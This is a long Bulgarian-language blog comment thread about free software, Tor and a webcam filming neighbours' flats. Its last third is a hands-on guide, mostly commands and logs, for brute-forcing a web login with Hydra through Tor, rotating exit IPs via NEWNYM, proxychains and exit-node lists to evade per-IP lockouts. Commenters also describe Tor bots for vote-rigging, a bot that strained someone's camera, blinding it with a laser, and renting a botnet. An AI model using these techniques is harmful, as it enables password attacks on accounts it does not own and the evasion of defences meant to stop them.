    Борбата на ГНУ е борба за свободния (от свобода, не безплатен) софтуеър. И да започват я, защото юникс започват да затварят софтуера. Затова и малко по-късно форкват FreeBSD, NetBSD и OpenBSD.
    „GNU’s Not Unix!“,[1][6] chosen because GNU’s design is Unix-like, but differs from Unix by being free software and containing no Unix code.[7]
    https://en.wikipedia.org/wiki/GNU

    Тази картинка на развитието на значимите ОС много ме кефи:
    https://upload.wikimedia.org/wikipedia/commons/7/77/Unix_history-simple.svg

  118. Фьт Дхюс Says:

    Така де, както казах другата ОС идва едва по-късно. По начало това не е бил проект за настолна ОС. Такъв става от Линус насам.

    БСД не са разделени по тази причина. Те идват след индианските войни като един компромис. Новел по-късно ще си плати за това, като днес е лош спомен.

    По-интересна е историята на Калдера.

  119. Stilgar Says:

    @бацето, ама то за такава цел ли ставало въпрос. Демек @никой ще организира да ми подбиват софтуера и да ми ядат пазарния дял?

  120. бацето Says:

    @Stilgar ами прави пазарен дял със свободен софтуеър. Отделно ти би станал голямо зло ако станеш монополист и поддържаш затворен софтуеър.

  121. Stilgar Says:

    Ама ти да не си пропуснал, че аз вече съм и ще ставам цел?

  122. някой Says:

    Stilgar ходи реви на щатите на на микромеките да те защитават, поне да те бяха застраховали като им правиш безплатна реклама. Има моменти в които ако вземем сумарно всички 15 годишни геймъри не виждали нищо друго освен логото „games for боза“, разните там „умници“ тип „мюзикаутор“ и Балмър, че даже и наков, то ти ще ги надминеш всичките в превъзнасянето на микромеките и затворено-платено-налагане-на-лицензното.

  123. intel Says:

    Имаше времена, в които този блог беше просто – блог (с малко скрита реклама) 😀

    А погледнете до къде стигнахме. Време е да добавите един форум и войната за свободи да започне…

    (Вече си представям как Stilgar ще си добави логото „Microsoft Partner“, само и само да троли хора като @никой)

  124. Stilgar Says:

    Само MS да не разберат, че съм го добавил без да имам право, че ще ме затворят като no-ip 🙂

  125. +o Says:

    Никакъв форум, че ще се разтворят нещата. Най-добрия ПР е флейма. Даже трябват още 2-3 $М единици, че сега върви еднонишково спора. Но те пък трудно се намират, пари имат, но цървквата им е слаба, виж при фрито не е точно така.

  126. Stilgar Says:

    Лесно ти е на теб с тоя P.R. На мен ми трябва застраховка щото любителите на свободата на словото не харесват к’во говоря 🙂

  127. някой Says:

    аха стигнахме до свободата на словото. Аз нямам нищо против да те псувам тука, само че ти имаш против конкретни действия срещу теб когато такива са предприети в ущърб на много хора. Тоест дори нямаш смелост да си защитаваш простотиите които пишеш, аз много ще се радвам да продължаваш да хленчиш със „права и свободи“ докато до вчера си бил против тях.

  128. Кирил Says:

    @Stilgar тъй като майкрософт може да те съдят аз ти предлагам да си сложиш „Кибертрон партньор“. Тази корпорация знае как се прави бизнес, за разлика от серсемите от майкософт. Обаче с логото на толкова перфектна компания няма да можеш да ядосаж никой.

  129. Stilgar Says:

    Няма, то се видяло, ще трябва да се изнасям в САЩ.

  130. +o Says:

    @някой – аз не мога да разбера как някой който прави затворен код, иска да ходи свободно и да се възползва от плодовете на това против което е работил ? Като работиш за феодалния модел стой си крепостен някъде. Не ли е, така ? Като много знаеш и кодиш затворено, кат не шерваш и контрибутваш, айде асеновата крепост да ти мръзне кръста там. Стой 2 дена пък като те пуснат ще тичкаш до вас да си направиш гитхъб.
    Защото затворения код е като комунизма – от неуко момче, те превъща в прост феодален чичка !

  131. intel Says:

    Темата за ДПС чука на вратата на блога – въпроса е кой ще ѝ отвори? 😀

    =* Shit happens Golden Partner *=

  132. някой Says:

    проблемът е че като си направиш гитхъб идват и го бутат феодалните чички и то не само твоят ами на всички под някакъв предлог и после го изкарват правилно и легално, хората, времето им и проектите кучета ги яли, всичко трябва да е лъжем и мажем че докато си плащаш щото/и не трябва да разбираш,дупките си седят, лицензите се препродават, стартиращите се изкупуват, а тези които изобщо вършат някаква работа, която не е реклама, получават само трохи и къси крайни срокове.

  133. thd Says:

    Ахаха , на рецайкъл бин-а са му сложили и скъп катинар 🙂

    http://arstechnica.com/apple/2014/07/keep-thieves-from-stealing-your-2013-mac-pro-with-a-49-lock-adapter/

  134. Фьт Дхюс Says:

    Гледай сега странна работа. Аз от 2007-ма никъде по машините си нямам тази ОС. Гордея се, че не съм се и докосвал до Москвич Осмак, а опита ми със Седмак е незначителен. Тая уж ОС не мога да я трая и в червата си, от що ми е противна. Докато бях две години безработен се радвах, че не ми се налага да я ползвам. И въпреки това не ми пречи да си водя нормален разговор със Стил.

    От друга страна потребители на това дето и той е потребител, едва ли не кръв взеха да проливат. Необяснимо?!?

    Иначе за форум, форум има. Форума на „Научи ме“ си бачка.

  135. Stilgar Says:

    А пък на стартиращите ако знаете колко им е гадно като ги изкупуват… мъка, мъка…

  136. +o Says:

    @Intel – еми аз лекичко я подбутвам, ама не искам аз да съм инструмента на властта, дето се вика ръгам чушки в боба, ама не искам аз да пръцна първи

    @Stilgar – Не, те са възпитани благодарно да си продават проектите. Елате ме купете, чички. Майтапа на страна аз това с продажбата на стартъпи не го разбирам. Толкова ли няма един за цвят, който да каже „а бе я че си пасем овцете сам“.

  137. List Says:

    „затворения код е като комунизма – от неуко момче, те превъща в прост феодален чичка“

    Е няма как, това отива в тетрадката 😀

  138. Stilgar Says:

    +о има, бе, за Facebook не си ли чувал? Ама малко са будалите дето ще се занимават да направят втори милиард вместо да вземат първия и да си висят с пурата и курвите на яхтата до края на живота си.

  139. gat3way Says:

    Бах, добре че е отворения софтуер, че да се пръкват осъзнати хора.

  140. thd Says:

    Дъ съ мафкъте с тайъ бозъ фкиснатъ 🙂 🙂 🙂

  141. thd Says:

    Видяхте ли сега екстремистите къде били 🙂 ахахаха.

    http://arstechnica.com/security/2014/07/the-nsa-thinks-linux-journal-is-an-extremist-forum/

    http://arstechnica.com/tech-policy/2014/07/report-rare-leaked-nsa-source-code-reveals-tor-servers-targeted/

  142. gat3way Says:

    Аз tor ползвам предимно за да правя сечено на полит-троловете от БСП и ГЕРБ като ударно набивам 5-6 пъти повече плюсчета или минусчета от тези, които техните тролчета ударно набиват на разни коментари, обикновено първите 5-6 след някоя тъпа новина. Просто за кеф и защото винаги съм се чудил скучаещите тъпани в партийните им офиси как псуват и как се червят за резултата пред шефовете си.

    Чудно NSA какви изводи ще си направи от цялата работа.

  143. thd Says:

    Трябва да се осигурява постоянна работа за дата центровете и персонала на нса , не бива да остават без хляб 🙂 . Данакоплатците им да си стягат задника 🙂

  144. thd Says:

    То общо взето това е цялата идея , един дебел бюджет да им отпуснат и те си го оправдават с някакви простотии. Като тука същата работа. Строят нещо , пишат го за толко и толко пари, и 90% отива на някой в джоба 🙂 и строежа се напуква още преди да се отвори за ползване (примерно) 🙂 щото нито материала е тоя , нито количеството …

  145. +o Says:

    преди време един просташки сайт срс.бг беше сложил камера управлявана от уеб интерфейс точно срещу висок блог (от другата страна на мола на цариградско) и всичко се вижда, а разбира се имаше и кой да гледа особено петък и събота в спалнята на някакви семейства и женки разбира се. Грозна работа. Един френд се обади на собственика на сайта да си направи камерата така, че блока да е затъмнен, но оня беше приел това като добра реклама на сайта си и лайната които продаваше. Та докато лепнем едно съобщение във входа за да съобщим на хората какво става се заех да направя един curl bot, който прокарах през тор. На оня камерата взе да вие, ту на ляво ту на дясно. Е не можах да я счупя, но ако я бях оставил нещата 2-3 месеца щях сереиозно да амортизирам, а при добър късмет и да я счупя
    Та по тоя повод скоро гледах една библиотечка mechanize (за питон) какви неща предлага. Сигурно ако някой се заеме може да натроши бая тролски заплати
    @gat3way чух че ти е скучно ;П

  146. +o Says:

    в берлинското метро „терористично“ обучава пътниците как се ползва тор
    https://pbs.twimg.com/media/BnBLBbrIUAAwW58.jpg

  147. gat3way Says:

    Не съм много убеден в това. Според мен е доста икономически оправдано занимание. В днешно време прекалено много икономически и политически лостове могат да се бутат ако просто имаш информация за нещо в правилното време. Излиза по-евтино отколкото да подържаш огромна армия дето се млати навсякъде по света, както и дебел бюджет за купуване на ключови хора. Ако не беше така, китайците нямаше да се стараят да копират начинанието примерно.

  148. gat3way Says:

    +о, аз за тая камера знам, подслушвайки разговорите на разни радиолюбители в София, единия от тях очевидно подържа въпросната камера. Една вечер ги слушах как обсъждат някаква абитюрентска оргия дето се стриймва от камерата и тоя дето я стопанисва се чувстваше окрилен от идеята да събира пари за гледане, ехех. Ето виждате ли, сега, полезно е да се слухти 🙂

  149. thd Says:

    Не я ли е прибрал още някой тая камера ? 🙂

  150. +o Says:

    @gat3way – тоя е голям простак, на телефонното обаждане беше казал, че хората искали да ги гледат, за да не ги окрадат. Направо не ми се говори, че почвам да се ядосвам. Трябваше да го запишеш

    @thd – ами тя монтирана в някакво таванско на отсрещния блок

    @някой – имаш нова цел, стилгар отпада (за сега!). слагай мерника на тоя идиот с камерата

  151. gat3way Says:

    Е че аз откъде да знам че ще стане знаменитост. Аз през цялото време исках да разбера ква е тая велика оргия, ама никой не се изтърва за адреса на камерата в ефир. Оооообаче вече знам, мухаха.

  152. Stilgar Says:

    Да се забрани на хората да си слагат камери в къщите! Направо да им се забрани да притежават камери!

  153. thd Says:

    От тия показалки 1-2W лазерните в обектива дали ще е добре ?

  154. +o Says:

    Имаме казус тука!
    1. Човека е наел таванското на отсрещния блок и е пуснал интернет тв, за да снима личното пространство на неподозиращите живущи.

    2. Германската телевизия отива да снима етаж от хотел „Берлин“ в Бояна, на който живее дебел български олигарх. Екипа има проблеми с охраната, а по-късно и с полицията, която ги посреща при инициативата на екипа да заснеме други имоти на въпросния.

  155. Кирил Says:

    Хора това нещо с камерата сериозно ли се случва, още не мога да го повярвам. Този човек трябва да се осъди.
    Stilgar в случая не говорим за снимане в твоята къща, а в къщите на другите. Това е едно от възможно най-бруталните нарушение на личното пространство. И трябва да е незаконно. Хората пробвали ли са да го осъдят?

  156. Stilgar Says:

    По принцип ако има някъв брутален zoom тая камера може да се окаже, че е незаконно обаче не мисля, че разумен човек може да очаква, че като излезе гол на терасата няма да го видят.

  157. thd Says:

    От тия управляемите има 36X оптичен дето са , стандартен бинокъл е 7X-10X

  158. thd Says:

    http://www.youtube.com/watch?v=fBVDp5eBMhU 🙂

  159. +o Says:

    @Кирил – камерата още си е там може да я видиш и да пробваш зума. Понякога има технически проблеми, тогава опитай отново да заредиш страницата. Препоръчвам ти следното, да влезеш някъде към 19-23 вечерта (през деня има отблясъци в прозорците, но също се вижда), когато хората са се върнали от работа и да не управляваш камерата, а само да гледаш. В един момент камерата започва да се мести и то на ключови места с женско присъствие. Някой порно манияк или група такива знаят по апартаменти какво става, кой кога се прибира и т.н.
    Бяхме оставили подробно съобщение на хората какво става, как да влязат в сайта и да се гледат (тогава спрях и бота за да оставя маниаците да ги скиват отново), какви мерки евентуално да предприемат. Не след дълго видяхме на някои прозорци направени прегради от закачалки, дрехи, и т.н. там където няма пердета. Дали хората са стигнали по-далече в защитата си не знам.

  160. thd Says:

    При нас рядко има прозорци без щори.

  161. Stilgar Says:

    А вие мислили ли сте, че тея дето нямат пердета може да обичат да ги гледат? 🙂

  162. thd Says:

    Ей туй не се бях сетил 🙂 ама има такава вероятност. Щом си качват домашното порно по разни сайтове, вероятно обичат да ги гледат. Пък някои даже и за безплатна реклама на бардака може да го ползват 🙂

  163. Кирил Says:

    Ами и аз не знам, но мисля, че биха могли да се обърнат към адвокат. Обаче не знам дали ще успее да им свърши работа.
    Втората и сигурна възможност е да намерят човека, които е сложил камерата и за определена сума има здрави момчета, които за нула време могат да го накарат да махне камерата. Това са двете възможности, които аз виждам.

  164. thd Says:

    Като можеш да гледаш през камерата за няколко секунди можеш да и прицелиш едно лазерче с адаптер в купола и ще вижда само цветно сияние 🙂

  165. Sfolter Says:

    Малко отклонение, но някой има ли идея защо, когато зареждам главната страница с mp3 файловете на nerds2nerds Google Chrome не може да зареди всички ресурси, най-вече mp3 файловете, които или ги дава като pending или сървъра връща 304, че нищо не е променено и все пак опитва да зарежда нещо. Това забавя рендването на страницата с няколко секунди, въпреки че html-a, css, картинки са заредени. Ако спра зареждането, страницата веднага се рендва.
    Някой с Chrome изпитва ли същите проблеми? С други браузъри всичко е наред. Аз съм с 35-та версия.

  166. thd Says:

    Няма идеален браузър 🙂 Се ще има нещо дето да не му е на ред.

  167. thd Says:

    Я да видим тоя браузър ще го разпознае ли …

  168. +o Says:

    @Sfolter – със SWIron v31.xxxxx, което си е орязан Chromium тествах и не виждам проблеми

  169. thd Says:

    Той я отваря страницата, ама врътката за лоудинга не спира да се върти и пише procesing request …

  170. Nonev Says:

    Фанете турете един форум да се коментират над/под/изподкастовете. Хем ще е лесно цитирането, ембедването на снимки, търсенето и не на последно място ще катурнете форума на дата и калдата.

  171. +o Says:

    @Sfolter – това ти казвам няма проблем при мен

  172. Sfolter Says:

    @+o, проблема е с версия 35, а ти си с 31 (ако си пробвал от същия браузър от който пишеш). Тествах и под уиндолс, и под един друг линукс пак последна 35-та версия на хром – същото. Интересното е, че ако известно време не съм зареждал сайта, пърия път няма проблеми, следващите пъти почва изкарва рекуестите на mp3 файловете като недовършени. Нямам добавки като адблок и подобни.

  173. gat3way Says:

    Форума трябва да има един раздел „конспирации“ и гарантирам че последния бързо ще избие рибата и ще удари повече мнения, отколкото всички останали раздели взети заедно.

  174. thd Says:

    Аз викам да спретнете едно малко студио и да правите предаване направо. То без това няма никакво такова. Нито за хардуер , нито за софтуер , нито за игри , да не говорим за качествени конспирации (обичаме конспирации 🙂 )… Или има ама аз не съм го видял щото не гледам телевизия … Какво ви трябва там , една – две камери малко декор и готово. Ако ползвате една камера малко тясно ще ви е да се хващате в кадър, абе по от далечко ще стане ….

  175. taniiak Says:

    Конспирации, обичам конспирации …. +1

  176. +o Says:

    Аз първо викам да направим един мийт или конф, във който всеки да направи лекция против някоя от тезите на stilgar. После за разнообразие и stilgar ще направи лекция, докато ние ядем пуканки и викаме У-а-У-а-у , за да имаме материал за следващия конф/мийт

  177. Sfolter Says:

    thd, телевизията е отживелица, но български канал с тая насоченост в youtube, направен професионално наистина не съм виждал. А за игри нали има AFK TV и разни други по vbox7 и за телефони има и за лаптопи само това липсва. 🙂

  178. бацето Says:

    Конспирации ..
    http://cdn.imghack.se/images/5aab6384312dc321218598fb8a3af729.png

  179. jazzman Says:

    „Аз tor ползвам предимно за да правя сечено на полит-троловете от БСП и ГЕРБ като ударно набивам 5-6 пъти повече плюсчета или минусчета от тези…“

    Със скрипт ли го правиш или менуално през браузъра на TOR? Има ли възможност да се генерира различен IP address след всеки рикуест ползвайки cURL или hydra да речем? Искам да направя една brute-force attack срещу един мой акаунт ( просто за тест), който ползва IPB forum, щото ся след всеки 3-ти неуспешен опит системата заключва акаунта ми за 15 мин, но само към този ip address, за това искам да ги въртя на всеки 3-ти да се сменя.

  180. jazzman Says:

    Хм…номера стана обаче след ребутане на сървиса. Проблема е, че отнема 2-3 сек докато си взема новият ip address ползвайки локаният сокет в/у tor. Та въпроса вече е, как мога да генерирам нов ip address при вече вдигнат сървис без да се налага да го рестарирам на всеки 2 сек да речем.
    По някаква причина система по-горе е счела, че вече съм виндовлс потребител и то без държавна принадлежност …нали така @баце?

  181. thd Says:

    @jazzman, туй дето го мислиш не може да стане 🙂 Няколко секунди винаги ще минават докато смени IP пък брутфорса и половин секунда лаг що го изгърби.

  182. бацето Says:

    @jazzman ем така изглежда

  183. jazzman Says:

    много време е знам това.. ся съм се заровил в документацията да видя дали не мога да въртя само порта в/у сокета слагайки го в някаква група и да се види дали няма да генерира нов ip, ама нещо ме съмнява.. ако някой знае как става номера да пише….тук някой спомена, че бил писал скрипт под curl, ама не знам дали е въртял ip-ta по начина който аз искам…

  184. thd Says:

    Иначе за смяна на IP без да рескаш сървиса, през telnet ставаше ама и накакъв фингърпринт трябваше да се пейства в телнета да те пусне като идентификация, иначе става и от тоя браузърния плъгин дето си е на тор-браузъра new identity. И пак ще ги има тия секунди за новото IP де , докато го вземе.

  185. thd Says:

    А има и друг вариянт , да вдигаш примерно 5 тор сървиса вместо един на различни портове , то на един няма и да може де , и докато ползваш 1 другите да се сменят .

  186. thd Says:

    Ама не като сървис де , трябва да ползваш тоя тор дето е от бъндъла … ти се сети де сигурно …

  187. jazzman Says:

    Аз бъндъла компилирах в контейнер, но трябва да се стартира сървиса за да мога да го ползвам локално/конзолно през curl или hydra. Ще търся някакво по елегантно решение, не ми се ще да рибутвам кът дървар всеки път, не че не съм от Родипите де 🙂

  188. jazzman Says:

    „@jazzman ем така изглежда“
    Още ли ме съжаляваш 🙂

  189. thd Says:

    Що в контейнер, те си вървят като отделни процеси само порта не трябва да се дублира , а за контрола ей де е :

    https://stem.torproject.org/faq.html

  190. thd Says:

    @jazzman, Ама това малко не си заслужава целия труд всичкото , освен ако не е за спорта 🙂 Преди дето бях писал за една машинка вирусясала, намерих го че не е пробита с брутфорс по ssh-a (аз си знаех че не е от там де) … Излезе инсталиран вируса по системата харакири хаха 🙂

  191. jazzman Says:

    „Що в контейнер“

    Там имам php, perl, curl и т.н. целият ми development stack е изнесен в контейнери.

  192. jazzman Says:

    „@jazzman, Ама това малко не си заслужава целия труд всичкото..“

    е….аз съм човек без работа. разбира се, че е за спорта….просто ми е гъдел…хоби, кво да се прави 😉

  193. бацето Says:

    @jazzman ако си промениш гледната точка спрямо България, няма да имам причина. Радваш ли се например на успеха на Григор Димитров?

  194. gat3way Says:

    Обикновено си дращя бързи скриптове и засилвам заявки с curl щото е най-лесно. Аз между другото когато съм в настроение правя доста по-лоши погроми срещу политтроловете, но не мога да говоря за това, защото излизат малко извън рамките на легалното 🙂

    Жалко че следващите две седмици ще си поемат малко дъх от мен тъпите копеленца, но ще се върна и пак ще им вгорча жалкия животец. А само да дойдат изборите, поне няколко от тия ще вкарам в болница поради сърдечни проблеми, обещавам.

  195. +o Says:

    @jazzman и аз съм търсил в старото api за смяна на ип-та ам не можах да намеря, ама бях май близо до някакво хакабъл решениe, щото помня че се кефих за нещо. В документацията го нямаше, ама броузера имаше таква опция и от там нещо май бях се сетил. Виж ако има ново апи може да са го заширили. Аз си бях играл различните простотии да минават през различни групи ип-та, примерно когато чатя винаги да минавам през exit node-вете на chaos computer club и някакви такива простотии . А за curl-a трудно е да се каже бот, някакави бутончета се натискаха, и чекиджиите им идваше малко байгън.
    Ако откриеш как да сменяш ип-та плийз шерни да не се мъча, че аз май скоро ще се пробвам с питоня и една готина билиотечка mechanize точно през тора.

    Хем ми се спи, хем ми се говори, Баси случая ….

  196. Stilgar Says:

    @gat3way да се върнеш за изборите 🙂

  197. jazzman Says:

    „@jazzman ако си промениш гледната точка спрямо България, няма да имам причина. Радваш ли се например на успеха на Григор Димитров?“

    @бацето, ами да, смятам да променя позицията си и съм в процес на обмисляне в отказване от българското си гражданство. Смятам, че човек трябва да има само едно, от чисто морална гледна точка. За Гришата, не, не ме радва, не гледам тенис и не ме вълнува много, много, но….. оценям това което е постигнал.

    „Ако откриеш как да сменяш ип-та плийз шерни да не се мъча,……“

    @+о, разбира се, стига да може. Гууглето мълчи по въпроса, в сайта им също нищо не открих.

    @gat3way, интересен подход си избрал 🙂

  198. jazzman Says:

    Другият вариант е да гепя списъка с всички tor exit nodes адреси и да ги въртя през hydra, но ще пробвам по късно, че съм на работа в момента. Ето списъка за днес – https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=123.123.123.123

  199. thd Says:

    С тоя брой IP-та имаш грубо казано около 10000 опита да уцелиш паролата . Едва ли ще ти стигнат.

  200. +o Says:

    3445

  201. jazzman Says:

    3445*3 за всеки опит и акаунта се заклчва за 15мин за този ип аддрес.
    Има една опция в/у браузъра „new identity“ където си взема адрес почти моментално при мен. Трябва да потърся как обаче тва става в конзола, няма начин да няма опция 😉

  202. thd Says:

    Ам аз 12-13 коментара нагоре пуснах линк как става ама си го пропуснал 🙂 . През телнет:

    telnet localhost 9051
    AUTHENTICATE
    250 OK
    SIGNAL NEWNYM
    250 OK

    https://stem.torproject.org/faq.html

    ей тука има и пример с python

    http://stackoverflow.com/questions/9911283/python-controlling-tor

    http://stackoverflow.com/questions/9925381/python-script-exception-with-tor

  203. thd Says:

    https://github.com/craig/ge.mine.nu/tree/master/tor-ctrl

  204. thd Says:

    https://svn.torproject.org/svn/tor/branches/hidserv-perf/contrib/tor-ctrl.sh

  205. jazzman Says:

    Ще разгледам линковете по-късно. Какво забелязах, ако услугата е стартирана след 10 мин се сменя ip address-а автоматично, значи все пак има някакъв дифаоутен тайминг, само дето не знам дали мога локално да го задавам 😉

  206. thd Says:

    А , ей тука за оня питон скрипт lib-а дето трябва да се импортне:

    https://svn.torproject.org/svn/blossom/trunk/TorCtl.py

  207. thd Says:

    А той още либ има дето трябват сори за флууда 🙂 , ей тука са всичките ама сега ги видях …

    https://svn.torproject.org/svn/blossom/trunk/

  208. jazzman Says:

    ле-ле тези са големи глави…евала за труда им….някои от имената са ми познати 🙂

  209. jazzman Says:

    @thd, познанията ми в питоня са повърхностни. Тез скриптове ги гледам кът голем камък, отбирам само от perl, php и bash.
    Ама мерси все пак де 😉

  210. jazzman Says:

    „Ам аз 12-13 коментара нагоре пуснах линк как става ама си го пропуснал“

    Не съм бре, само дето не моа да видя къв е смисъла да пускам telnet?
    И що твоят порт е 9051? Моят е 9050….през curl ( в терминал) пускам следното до сокета на сървиса:

    [root@lxc1]# curl –socks5-hostname localhost:9050 http://myappaddress.com/getip.php

  211. thd Says:

    9050 е по дефаут на бъндъла , а тоя от тор репоситоритата дето се инсталва като сървиз по дефаут е на 9051, както и да е порта няма значение. Можеш да ползваш шел скрипта и той ползва телнет.
    В телнета като се кънектнеш трябва да се направи authentication с кукито или хеш от него , командата за новото IP e NEWNYM ако ползваш директно телнет.

  212. gat3way Says:

    Не така. tor се инсталира винаги с privoxy, поради две причини – да си сигурен че няма да правиш DNS заявки към никой resolver без последните да минават през тор мрежата и за да ти рандомизира user agent-а и каквито още там request хедъри могат да те издадат. Ти може да пратиш 1000 заявки от различен IP адрес, ама не е хубаво на всичките useragent-а да им е curlнещоси.

    tor е лоша идея за брутфорсване на пароли защото няма толкова много exit нодове за целта и защото е бавно. Наеми си от келешите някое парче от ботнет и го прави оттам.

    Плюс това не можеш да контролираш с какъв адрес ще излезе заявката,единствено можеш да насилиш тор клиента да изгради нова верига от три хоста там през която да мине трафика и да се надяваш че третия ще е различен. Това става автоматично през някакъв конфигуруем период от време (в момента не се сещам конфигурационната опция в torrc). Алтернативно /etc/init.d/tor reload. Изграждането на нова верига отнема известно време обаче щото клиента ходи да си говори с директорийните сървъри.

    Та такива неща с тор злоупотребите.

  213. jazzman Says:

    Тва почна да ги върти на 5 сек:

    [root@lxc1 .tor]# /usr/local/bin/tor –NewCircuitPeriod 5 –MaxCircuitDirtiness 1

    Ама трябва да се теста още за да съм сигурен. Номера с exit nodes също взе да придобива частичен успех 🙂

  214. jazzman Says:

    @gat3way, @thd ако знаете, а не да ровите вместо мен в мрежата как да накарам hydra да мине през SOCKS proxy-то на TOR. Ето една примерна брутфорс атака срещу един мой домейн намиращ се в контейнер:

    [jazz@centos-box ~]$ /usr/local/bin/hydra -l linuxmaniac -P words.txt -t 4 -w 32 -v -s80 192.168.122.2 „/ivymusic/index.php?action=login:first_name=^USER^&password=^PASS^&user_id=1:Invalid username or password“
    Hydra v8.1-dev (c) 2014 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2014-07-08 11:04:46
    [ERROR] Unknown service: /ivymusic/index.php?action=login:first_name=^USER^&password=^PASS^&user_id=1:Invalid username or password
    [jazz@centos-box ~]$ /usr/local/bin/hydra -l jazzman -P worst_pass.txt -t 4 -w 32 -v -s80 -o /~/passwords.found 192.168.120.12 http-post-form „/ivymusic/index.php?action=login:first_name=^USER^&password=^PASS^&user_id=1:Invalid username or password“
    Hydra v8.1-dev (c) 2014 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2014-07-08 11:05:37
    [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort…
    [DATA] max 4 tasks per 1 server, overall 4 tasks, 479830 login tries (l:1/p:479830), ~29989 tries per task
    [DATA] attacking service http-post-form on port 80
    [VERBOSE] Resolving addresses … done
    [STATUS] 693.00 tries/min, 693 tries in 00:01h, 479137 todo in 11:32h, 4 active
    [STATUS] 688.00 tries/min, 2064 tries in 00:03h, 477766 todo in 11:35h, 4 active
    [80][www-form] host: 192.168.120.12 login: jazzman password: some_password
    [STATUS] attack finished for 192.168.120.12 (waiting for children to complete tests)
    1 of 1 target successfully completed, 1 valid password found

    Пробвах нещо подобно през сокета на tor обаче не ще да зацепи, по точно се опитва да намери паролата на сокета 😉

    [jazz@centos-box ~]$ /usr/local/bin/hydra -l jazzman -P words.txt -t 4 -w 32 -v -o /~/passwords.found socks5://127.0.0.1:9050@192.168.120.12 /ivymusic/index.php?action=login:first_name=^USER^&password=^PASS^&user_id=1:Invalid username or password“

    Честно казано доста си поиграх и то с различен синтакс обаче неще да мине през сокета, очевидно бъркам някъде 😉

  215. jazzman Says:

    Копирал съм нещо грешно по-горе, тва е правилният синтаксис:

    [jazz@centos-box ~]$ /usr/local/bin/hydra -l linuxmaniac -P words.txt -t 4 -w 32 -v -s80 -o /home/jazz/passwords.found 192.168.122.2 http-post-form „/ivymusic/index.php?action=login:first_name=^USER^&password=^PASS^&user_id=1:Invalid username or password“

    Result:

    [80][www-form] host: 192.168.122.2 login: linuxmaniac password: password
    [STATUS] attack finished for 192.168.122.2 (waiting for children to complete tests)
    1 of 1 target successfully completed, 1 valid password found

    Ся въпроса е през сокета как да стане?

  216. thd Says:

    torsocks app -parameters можеш да пробваш

  217. jazzman Says:

    Пробвах с socat (понеже съм го ползвал) изрично да форсвам/пренасоча всичките http заявки към този контейнер (192.168.122.2) да минават през сокета на tor, обаче се получава конфликт с hydra.

  218. thd Says:

    btw вече ти знаят и юзърнейма и могат да ти проведат една по успешна атака 🙂

  219. jazzman Says:

    „torsocks app -parameters можеш да пробваш“
    Как да вкарам към брутфорс стринга?

  220. jazzman Says:

    „btw вече ти знаят и юзърнейма и могат да ти проведат една по успешна атака“

    не се плаша да атакуват 🙂 скоро ще сменям сървърите 🙂

  221. thd Says:

    „Как да вкарам към брутфорс стринга?“
    Няма смисъл.

  222. jazzman Says:

    ами? къде да го задам тва чудо – torsocks app -parameters

  223. thd Says:

    пример:

    torsocks ssh -l username 192.168.0.1

  224. +o Says:

    зависи аз много се кефя да го ползвам със socat имаше и някакъв wrapper нещо torify или нещо подобно

  225. jazzman Says:

    Трябва да може със socat, очевидно пропускам нещо дребно, но след мача ще се пробвам пак 🙂

  226. jazzman Says:

    хаха, няма как да стане с локален адрес и затова е имало и конфликт понеже заявката де-факто идва от външно ip. Вместо вътрешният адрес, трябва да се зададе външният на router-a и да му се направи PREROUTING към контейнера. Нещо подобно на:

    -A PREROUTING -d 123.142.126.12 -p tcp -m tcp –dport 9150 -j DNAT –to-destination 192.168.122.2:80

    По този начин curl и tor браузъра рендират дейтата нормално, ся остава да видя как шъ стане под hydra 😉

  227. +o Says:

    Ти ли си правил контейнера или ползваш готово решение като lxc ?

    Аз имах проблем с хеадъра на заявката към апачито, защото всъщност бях вдигнал уеб проксито на локален адресс да кажем 127.0.0.1:4949 и отсреща апачито си незнаеше кой виртуален хост да ми отвори.

  228. jazzman Says:

    LXC библиотеката ползвам, но идните дни смятам да се заиграя и с docker.

  229. jazzman Says:

    През „proxychains“ стана номера, но отнема малко повече време, което е съвсем нормално. Е тва е лога от атаката:

    [proxychains] Strict chain … 127.0.0.1:9050 … 123.182.223.110:80 [80][www-form] host: 123.182.223.110 login: linuxUser password: password
    [proxychains] Strict chain … 127.0.0.1:9050 … 123.182.223.110:80 [STATUS] attack finished for 123.182.223.110 (waiting for children to complete tests)
    [proxychains] Strict chain … 127.0.0.1:9050 … 123.182.223.110:80 … OK

  230. thd Says:

    Туй с таблица, или върти азбучно ? В таблица сигурно това е първата парола дето пробва 🙂

  231. jazzman Says:

    Не на 600-но място сложих правилната парола в текстовият файл, проблема е, че се появяват повторения на адреса…..ся както е момента имам грубо около 200 опита в минута… трябва да допиша скрипта след 3-то повторение да вземе ново ip: Виж error_log на сървъра за кво иде реч ( поствам малка част)

    [Fri Jul 11 11:55:29 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:29 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:29 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:30 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:31 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:31 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:32 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:32 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
    [Fri Jul 11 11:55:33 2014] [error] [client 74.120.13.132] PHP Notice: Undefined index: password in /var/www/html/public_html/twig/ivymusic/libs/User.php on line 28
